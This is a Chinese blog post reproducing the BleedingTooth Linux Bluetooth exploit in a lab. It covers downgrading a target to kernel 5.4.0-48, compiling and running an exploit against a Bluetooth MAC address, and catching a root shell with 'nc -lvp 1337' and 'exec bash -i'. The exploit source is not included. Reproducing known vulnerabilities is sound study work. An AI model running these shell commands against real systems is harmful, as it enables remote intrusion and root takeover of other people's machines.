BleedingTooth蓝牙漏洞复现

最新推荐文章于 2024-08-02 22:08:44 发布
最新推荐文章于 2024-08-02 22:08:44 发布
阅读量370 收藏 6
点赞数 3
文章标签: ubuntu linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wu2tian/article/details/140385795
版权

目录

一.准备工作:

二.复现

一.准备工作:

环境:

1.攻击主机内核、ubuntu版本随意,被攻击主机内核版本为5.4.0-48-generic、ubuntu20.04

2.两台机器处于同一个路由器之下,若是被攻击主机为公网ip应该也行(未验证)

3.更换内核

3.1 虚拟机降版本教程VMware虚拟安装Ubuntu,然后切换Ubuntu内核版本_ubuntu开机切换内核-CSDN博客

3.2 实机内核降版本(5.13->5.4.0-48)

uname -r

#查询内核版本

sudo apt update

#更新软件包列表

sudo apt install linux-image-5.4.0-48-generic

linux-headers-5.4.0-48-generic

#安装指定版本的 Linux 内核镜像和头文件

sudo update-grub

#安装新的内核后,需要更新引导加载程序(GRUB)的配置,以便系统能够启动新的内核。

sudo reboot

#重启

uname -r

#验证内核版本

如果用的是两台虚拟机,需配置单独的蓝牙:VMware为多台虚拟机配置单独蓝牙-CSDN博客

二.复现

1.使用gcc进行编译:

gcc -o exploit exploit.c -lbluetooth

2.执行可执行文件,target_mac是要攻击机器的蓝牙mac地址,source_ip、source_port为本机的:

 sudo ./exploit target_mac source_ip source_port

3.在另一个终端中,运行(同一台机器):

nc -lvp 1337

报错:执行nc -lvp 1337 后

nc: getnameinfo: Temporary failure in name resolution

解决:

sudo gedit /etc/resolv.conf

添加:

nameserver 8.8.8.8

nameserver 8.8.4.4

4.运行

exec bash -i 2>&0 1>&0

成功取得被攻击机器的root权限

xing tong LI
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蓝牙安全入门详解 超详细
qq_37507251的博客
02-19 5858
iot安全 蓝牙安全
蓝牙漏洞、威胁与对策
G程师专栏
12-14 6754
译者按:本文是对NIST的文档《Guide to Bluetooth Security》第四节的翻译,原文链接http://csrc.nist.gov/publications/nistpubs/800-121-rev1/sp800-121_rev1.pdf。 本节描述了蓝牙技术中存在的漏洞和这些漏洞带来的威胁。基于这些被鉴别出的共同漏洞和威胁,以及第三节所述的蓝牙安全特性,本节也推
linux 蓝牙攻击,研究人员担心BleedingTooth蓝牙漏洞Linux系统带来风险
weixin_29266647的博客
05-16 109
原标题:研究人员担心BleedingTooth蓝牙漏洞Linux系统带来风险基于Linux的操作系统通常被认为比Windows等系统更安全,但这并不意味着它们完全没有安全问题。谷歌安全研究人员已经对Linux蓝牙堆栈中的一系列 "零点击"漏洞发出警告。该漏洞被称为BleedingTooth,最坏的后果是带来远程代码执行攻击。该问题影响Linux内核4.8及以上版本,可在开源BlueZ协议栈中找到...
linux kernel 蓝牙,BleedingTooth: Linux kernel蓝牙漏洞
weixin_39953100的博客
05-16 203
谷歌安全研究人员在Linux kernel中发现了多个蓝牙的安全漏洞,这些漏洞被称之为BleedingTooth。攻击者利用BleedingTooth 漏洞可以实现无用户交互的零点击攻击(zero-click attack)。BleedingTooth 漏洞实际上是由3个漏洞组成的,CVE编号分别是CVE-2020-12351、CVE-2020-12352和CVE-2020-24490。CVE...
linux 蓝牙攻击,BleedingTooth: Linux kernel蓝牙漏洞 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_34382015的博客
05-16 186
谷歌安全研究人员在Linux kernel中发现了多个蓝牙的安全漏洞,这些漏洞被称之为BleedingTooth。攻击者利用BleedingTooth 漏洞可以实现无用户交互的零点击攻击(zero-click attack)。BleedingTooth 漏洞实际上是由3个漏洞组成的,CVE编号分别是CVE-2020-12351、CVE-2020-12352和CVE-2020-24490。CVE-2...
谷歌:注意 Linux 内核中严重的零点击 “BleedingTooth蓝牙缺陷
smellycat000的专栏
10-15 440
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌发布了高危蓝牙缺陷(CVE-2020-12351)的详情,它影响支持BlueZ的Linux内核5.9以下版本的蓝牙...
linux 蓝牙可被发现,谷歌在Linux内核发现蓝牙漏洞 攻击者可运行任意代码或访问敏感信息...
weixin_39582656的博客
05-18 122
原标题:谷歌在Linux内核发现蓝牙漏洞 攻击者可运行任意代码或访问敏感信息更多全球网络安全资讯尽在E安全官网 www.easyaq.comE安全10月20日讯 据外媒报道,近日谷歌安全研究人员在Linux内核中发现了一组蓝牙漏洞(BleedingTooth),该漏洞可能允许攻击者进行零点击攻击,运行任意代码或访问敏感信息。BleedingTooth漏洞分别被命名为CVE-2020-12351,C...
蓝牙及其安全技术概述
TICPSH的博客
03-10 744
随着车辆蓝牙技术的发展和应用越来越广泛,车辆蓝牙安全问题也在不断引起关注。未来,随着人工智能和物联网等新技术的发展,车辆蓝牙技术的安全问题也将不断得到挑战和解决。车辆厂商和安全专家需要不断地研究和改进车辆蓝牙技术,保证车辆蓝牙系统的安全性和可靠性。
无线共存:利用蓝牙和 WiFi 性能特性实现芯片间提权
smellycat000的专栏
12-27 294
聚焦源代码安全,网罗国内外最新资讯!作者:Stephen Pritchard编译:代码卫士德国达姆施塔特科技大学安全移动网络组和意大利布雷西亚大学CNIT 的研究人员指出,无线芯片设计中...
Managing Users and Hostname on Ubuntu Server
weixin_44444492的博客
08-02 894
【代码】Managing Users and Hostname on Ubuntu Server。
ubuntu sudo命令不需要密码
weixin_43205308的博客
08-02 297
1、注释掉 %sudo ALL=(ALL:ALL) AL。
Linux运维总结:基于Ubuntu 22.04+x86_64架构CPU部署etcd 3.5.15二进制分布式集群》
东城绝神
07-31 1081
Linux运维总结:基于Ubuntu 22.04+x86_64架构CPU部署etcd 3.5.15二进制分布式集群》
ubuntu下解决Python plot中文显示问题
xiaojinger_123的博客
08-02 377
ubuntu下用Python脚本分析数据时matplotlib库显示中文字体如果不配置,基本上显示出来都是豆腐块样式,很影响显示及数据分析过程。安装完成后,在/usr/share/fonts/MyFonts下添加了很多新字体,比如我们就要使用黑体“simhei.ttf”Ubuntu的字体目录在/usr/share/fonts下,自带的中文字体不好用,所以先安装一下中文字体库。下的fonts文件夹,把之前选中的 simhei.ttf 复制到 fonts文件夹下。运行后,中文字体设置成功!
Linux中yum、rpm、apt-get、wget的区别,yum、rpm、apt-get常用命令,CentOS、Ubuntu中安装wget
最新发布
qq_44700578的博客
08-02 938
Linux中yum、rpm、apt-get、wget的区别,yum、rpm、apt-get常用命令,CentOS、Ubuntu中安装wget
linux磁盘可视化分析工具
吻等离子的博客
08-02 1053
Baobab 是 GNOME 桌面环境中的一款图形化磁盘使用分析工具。它能够扫描文件系统并显示各个文件和目录的磁盘使用情况,以易于理解的树形图或圆环图展示。这种可视化方式使得用户能够快速找到占用空间较大的文件和目录。Baobab 是一款非常实用的磁盘使用可视化工具,特别适合用来分析和管理 Linux 系统中的磁盘空间。通过它的直观界面和强大的功能,用户可以轻松找到占用磁盘空间最多的文件和目录,从而采取相应的措施进行清理或优化。
LeetCode 572.另一棵树的子树 C写法
m0_63816268的博客
08-02 232
可以用上的方法,,如果有一轮比较成功就表示root包含subroot。
linux查询占用端口 杀死占用端口进程
ll回家了
08-02 227
在确定了占用端口的进程之后,您可以使用 `kill` 或 `pkill` 命令来终止这些进程。`lsof`(列出打开的文件)命令是另一个强大的工具,用于检查哪些进程在使用特定端口。您可以使用 `netstat` 和 `lsof` 命令来检查哪些进程在使用特定端口。- **`-n`**:以数字形式显示地址,避免DNS查找。- **`-p`**:显示进程的PID和程序名称。- `kill -9 `:强制终止进程。- **`-t`**:显示TCP端口。- **`-l`**:列出监听端口。
Linux地址空间详解
m0_74830524的博客
08-02 833
本篇通过对物理内存和页表详细的讲解,对 Linux 系统下的地址空间做了深度的剖析。
CanFestival在Linux下的使用
爱就是是恒久忍耐的专栏
08-02 756
Linux下使用CanFestival
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值